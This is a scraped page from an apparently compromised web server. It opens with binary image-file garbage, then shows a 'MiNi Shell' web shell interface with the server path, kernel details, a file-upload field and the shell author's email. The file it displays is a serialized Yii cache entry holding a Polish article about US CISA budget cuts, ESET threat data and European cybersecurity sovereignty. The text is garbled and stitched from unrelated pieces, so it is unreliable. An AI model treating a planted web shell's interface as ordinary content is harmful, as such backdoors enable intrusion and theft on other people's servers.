JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/3c/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/cache/3c/3c18775d5a5f5419691add9a12ff173e.bin

a:2:{i:0;a:2:{i:0;s:16041:" 
                    
                    <h3 class="title" itemprop="headline">Cybersecurity w USA z problemami. Europa i Polska w drodze do cyfrowej suwerenności [NOWE DANE ESET]</h3>
                    <p><span class="glyphicon glyphicon-time" aria-hidden="true"></span> <strong itemprop="datePublished"> 07-08-2025, 09:11</strong>
                        <meta itemprop="dateModified" content=" 07-08-2025, 09:11"/>
                        <div class="hide" itemprop="description">Sektor cyberbezpieczeństwa w Stanach Zjednoczonych znalazł się w okresie cięć budżetowych i redukcji zatrudnienia. Europa, dotychczas opierająca swoją obronność o kompetencje i zasoby głównie amerykańskich instytucji, zamierza postawić  mocniej na lokalne rozwiązania. </div>
                        <div class="hide" itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
                            <meta itemprop="name" content="automatyka.biz.pl">
                            <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
                                <meta itemprop="url" content="https://www.automatyka.biz.pl/images/loga/automatyka.jpg">
                            </div>
                        </div>
                        <div class="hide" itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
                            <meta itemprop="url" content="https://common.v-manager.pl/uploads/images/articles/85172/crop/800x600/pexels-photo-1089438jpeg-517576001754550928.webp">
                        </div>
                        <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://www.automatyka.biz.pl/artykuly/szczegoly/85172"/>
                        
                                        </p>

                    <div class="lorem">
                        <p><img class="img-responsive" src="https://common.v-manager.pl/uploads/source/articles/85172/pexels-photo-1089438.webp" alt="Cybersecurity w USA z problemami. Europa i Polska w drodze do cyfrowej suwerenności [NOWE DANE ESET]" loading="lazy" /></p>
<ul>
<li><strong>Sektor cyberbezpieczeństwa w Stanach Zjednoczonych znalazł się w okresie cięć budżetowych i redukcji zatrudnienia.</strong></li>
<li><strong>E</strong><strong>urop</strong><strong>a</strong><strong>, </strong><strong>dotychczas o</strong><strong>pierająca</strong><strong> swoją obronność o kompetencje </strong><strong>i zasoby </strong><strong>głównie </strong><strong>amerykańskich instytucji, </strong><strong>zamierza postawić </strong><strong> mocniej </strong><strong>na lokalne rozwiązania</strong><strong>.</strong></li>
<li><strong>Jest to również widoczne w polskich firmach – w 7 na 10 przedsiębiorstwach zwraca się uwagę na kraj pochodzenia </strong><strong>oprogramowania</strong><strong> i lokalizację serwerów - wynika z najnowszych danych ESET i DAGMA Bezpiecz</strong><strong>e</strong><strong>ństwo IT</strong><strong> zebranych w raporcie „</strong><strong>Cyberportret</strong><strong> polskiego biznesu 2025”. Premiera II edycji raportu jesienią.</strong></li>
</ul>
<h3 style="text-align:left;">Cięcia w USA a sytuacja polityczna</h3>
<p>Na rok 2026 w Agencji Cyberbezpieczeństwa i Bezpieczeństwa Infrastruktury Stanów Zajednoczonych (CISA) zaplanowano znaczną redukcję etatów, o ponad 1 000 osób – z 3 732 pracowników na stanowiskach według założeń miałoby pozostać 2 649. Większość pracowników już teraz zdecydowała o opuszczeniu miejsca pracy. Dodatkowo CISA może zostać dotknięta planowaną, szacowaną na niemal 500 milionów dolarów obniżką budżetu w ramach propozycji budżetowej prezydenta Donalda Trumpa. Tymczasem Biały Dom ma ważny głos w negocjacjach lub zaangażowany jest w działania dyplomatyczne wobec Chin, Rosji, Iranu i Korei Północnej.</p>
<blockquote>
<p>- Trwające konflikty zbrojne i napięcia w różnych częściach świata przyjmują postać hybrydową – tradycyjne działania zbrojne łączą się z działaniami w cyberprzestrzeni, np. w postaci aktywności cyberszpiegowskich grup APT. Ich aktywność w ostatnim półroczu (październik ’24 - marzec ’25) pokrywa się z działaniami zbrojnymi w poszczególnych rejonach świata lub generowanymi przez dane rządy napięciami. Z danych ESET wynika, że do najbardziej aktywnych grup APT należą te pochodzące z Chin – odpowiadają one za ponad 40% cyberataków, Rosji (25,7%) czy Korei Północnej (14,4%) oraz Iranu (9,1%) – tłumaczy <strong>Kamil Sadkowski, analityk laboratorium antywirusowego ESET</strong><strong>.</strong></p>
</blockquote>
<p>CISA od lat współpracuje z Agencją Unii Europejskiej ds. Cyberbezpieczeństwa (ENISA) dzięki zawartemu paktowi „Working Arrangament” w 2023 r. Przykładowo w maju 2025 przeprowadzono wspólną operację „Endgame”, likwidując ponad 300 serwerów malware, aresztując wielu podejrzanych i zabezpieczając miliony euro w kryptowalutach<sup>2</sup>. W czerwcu potrzeba ścisłej współpracy została podkreślona przez Hennę Virkunen, wiceprzewodniczącą wykonawczą Komisji Europejskiej ds. Suwerenności Technologicznej, Bezpieczeństwa i Demokracji<sup>3</sup>.</p>
<h3 style="text-align:left;">Kryzys w USA wywołuje efekt domino</h3>
<p>Ostatnie cięcia w budżetach oraz redukcje zatrudnienia w kluczowych instytucjach związanych z cyberbezpieczeństwem w Stanach Zjednoczonych niewątpliwie osłabią kondycję i bezpieczeństwo nie tylko administracji, ale również firm i podmiotów korzystających z ich wiedzy i wytycznych. To wpływa na innowacje technologiczne przyszłości, co z kolei będzie osłabiać skuteczność systemów cyberbezpieczeństwa również użytkowników indywidualnych.</p>
<blockquote>
<p>- Część skutków redukcji finansowania i zatrudnienia w sektorze cyberbezpieczeństwa będzie widoczna od razu – przez spadek jakości bieżących działań prewencyjnych oraz analizy zagrożeń. Z drugiej strony, pozostali członkowie mniejszych, „odchudzonych” zespołów będą narażeni na większe zmęczenie i wypalenie zawodowe, co może skłonić ich do odejścia z branży na rzecz mniej stresujących zawodów. Niedoinwestowanie da o sobie jednak znać także za kilka lat. Spowolnienie innowacji i wdrażania nowych technologii cyberbezpieczeństwa ujawnia się z opóźnieniem, a spowodowane jest na przykład wspomnianym stopniowym odpływem najbardziej wartościowych talentów. – dodaje <strong>Kamil Sadkowski</strong>.</p>
</blockquote>
<p>Jak wskazują eksperci, spadek finansowania w USA może objawiać się także w mniej widocznych i spektakularnych aspektach – na przykład w opóźnieniach w tworzeniu standardów czy utrudnieniach w rozpowszechnianiu informacji o zagrożeniach, które często wynikają ze współpracy publiczno-prywatnej. W rzeczywistości jednak wpływ będzie odczuwalny we wszystkich agencjach, instytucjach, firmach, a nawet przez zwykłych konsumentów.</p>
<h3 style="text-align:left;">Co to oznacza dla Europy?</h3>
<p>Według danych ESET aż 39% globalnych cyberataków w 2024 odnotowano w Europie<sup>4</sup>. Aby się chronić, wiele podmiotów polega na dostawcach rozwiązań z zakresu cyberbezpieczeństwa z różnych regionów świata. Coraz częstsze i większe spory handlowe oraz intensyfikacja cyberzagrożeń to ryzyka, które dostrzega również Komisja Europejska. Zapowiadany pakiet wydatków związany z realizacją planu obronności kontynentu, w tym na cyberbezpieczeństwo, wynosi 800 mld euro do 2030 roku.</p>
<blockquote>
<p>- Obserwujemy wyraźne napięcia geopolityczne i rosnącą polaryzację na świecie. Inwestowanie w technologie czy rozwiązania, które przesyłają dane do krajów budzących wątpliwości z punktu widzenia współpracy politycznej, rodzi pytanie czy rzeczywiście możemy bezpiecznie z nich korzystać? I jest to pytanie, które zadać sobie powinni zarówno przedsiębiorcy dbający o cyfryzację biznesu, jak i urzędnicy na szczeblach rządowych. Krajowy rynek rozwiązań z zakresu cyberbezpieczeństa dopiero się rozwija, natomiast w Unii Europejskiej dostępne są już narzędzia, które są równie skuteczne jak te globalne. Jednak, co ważne ze względu na europejskie pochodzenie są mniej narażone na polityczne i handlowe zawirowania, które mogą powodować ryzyka dla ciągłości działania wielu organizacji i biznesu - tłumaczy <strong>Marcin Mazur z</strong><strong> DAGMA Bezpieczeństwo IT</strong>.</p>
</blockquote>
<h3 style="text-align:left;">Firmy wolą rozwiązania z Europy?</h3>
<p>Świadomość i potrzeba budowania suwerenności cyfrowej jest już widoczna w znaczącej większości polskich firm. Potwierdzają to dane z II edycji raportu ESET i DAGMA Bezpieczeństwo IT „Cyberportret polskiego biznesu”, który ukaże się jesienią. Aż 7 na 10 specjalistów odpowiadających za cyberbezpieczeństwo w polskich firmach deklaruje, że w ostatnich kilku latach wzrosła ich czujność na to, jak kraj pochodzenia dostawcy oprogramowania może wpłynąć na cyberbezpieczeństwo firmy.</p>
<p>Co druga badana firma uważa, że zależność od dostawców oprogramowania spoza Polski i Europy stanowi potencjalne zagrożenie dla ich biznesu, natomiast 59% twierdzi że woli rozwiązania cyberbezpieczeństwa pochodzące z Europy.</p>
<blockquote>
<p>- To również zagrożenie dla bieżącego funkcjonowania społeczeństw. Europa powinna tworzyć i doskonalić cyfrową tarczę, która pozwoli skutecznie uniezależnić się np. od czynników politycznych. Obserwujemy, że cyberprzestępcy powiązani z rządami atakują cele infrastruktury krytycznej w poszczególnych krajach, co bezpośrednio może wpływać na funkcjonowanie społeczeństw. W ostatnich miesiącach celami ataków grup APT powiązanych z Rosją były m.in. oczyszczalnie ścieków, obiekty dostarczające energię, jak bioreaktor, elektrownia wodna, stacje uzdatniania wody. Możemy być pewni, że rozwój technik cyberprzestępców nie zwolni, stąd naturalnym jest, by Europa niezależnie zwiększała nakłady na cyberobronność – podsumowuje <strong>Kamil Sadkowski</strong>.</p>
</blockquote>
<p>Według danych ESET zawartych w Threat Report za I połowę 2025 r. Polska znajduje się w piątce najczęściej atakowanych przez cyberprzestępców krajów świata.</p>
<hr />
<p><small><sup>1</sup> https://cyberscoop.com/trump-administration-proposed-cisa-budget-cuts/ </small><br /><small>https://www.axios.com/2025/06/03/cisa-staff-layoffs-resignations-trump-cuts </small><br /><small><sup>2</sup> https://www.reuters.com/technology/eu-us-authorities-take-down-malware-network-2025-05-23 </small><br /><small><sup>3</sup> https://www.reuters.com/sustainability/boards-policy-regulation/eu-reliable-partner-digital-cooperation-amid-turbulence-tech-chief-says-2025-06-05 </small><br /><small><sup>4</sup> https://www.eset.com/blog/en/business-topics/threat-landscape/why-genuine-digital-sovereignty-requires-european-it-security/</small></p>                        
                         
 
                        <div class="googleads-article">
<!-- script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script -->
<!-- vManager - w treści artykułu 2 -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-6177099932506559"
     data-ad-slot="9192484574"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
                        </div>


                           
                    </div>
                    
                    <div class="text-center">
                                        </div>

                                            <p class="text-right">Artykuł zewnętrzny</p>
                                            
                      
                        
                        
                    
                                        
                                            <div class="nav-table tags mt05">
                            <div>Tagi:</div>    
                            <div>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=raport" class="label label-default">raport</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=IT" class="label label-default">IT</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=USA" class="label label-default">USA</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=cyberbezpieczeństwo" class="label label-default">cyberbezpieczeństwo</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Europa" class="label label-default">Europa</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=cyberprzestępca" class="label label-default">cyberprzestępca</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Stany+Zjednoczone" class="label label-default">Stany Zjednoczone</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=DAGMA" class="label label-default">DAGMA</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=cybersecurity" class="label label-default">cybersecurity</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=ESET" class="label label-default">ESET</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Cyberportret+polskiego+biznesu+2025" class="label label-default">Cyberportret polskiego biznesu 2025</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=CISA" class="label label-default">CISA</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=ENISA" class="label label-default">ENISA</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=obronność" class="label label-default">obronność</a>
                                                            </div>
                        </div>
                                            
                        
                    <div id="fb-root"></div>
                    <!--script async defer crossorigin="anonymous" src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0" nonce="2g9iczzS"></script-->
                    
<script>
//<![CDATA[
var lx=!1;window.addEventListener("scroll",function(){(0!=document.documentElement.scrollTop&&!1===lx||0!=document.body.scrollTop&&!1===lx)&&(!function(){var e=document.createElement("script");e.type="text/javascript",e.async=!0,e.src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(),lx=!0)},!0);
//]]>
</script>
                    
                    <div class="social text-center mb1">
                        <div class="fb-like" data-href="https://www.automatyka.biz.pl/artykuly/szczegoly/85172_cybersecurity-w-usa-z-problemami-europa-i-polska-w-drodze-do-cyfrowej-suwerennosci-nowe-dane-eset" data-width="" data-layout="button" data-action="like" data-show-faces="false" data-share="true"></div>
                    </div>

                    
                    <div id="articles">    
                        
                    
                                    ";i:1;N;}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:2:{i:0;s:13:"article_85172";i:1;s:8:"articles";}s:4:"data";a:2:{s:32:"4dafdbf32fa8cc5527407d4e5b53bd0f";s:21:"0.69238900 1754551432";s:32:"9f4ebfa1b76d6bc6617aec9034853422";s:21:"0.22954000 1749980350";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com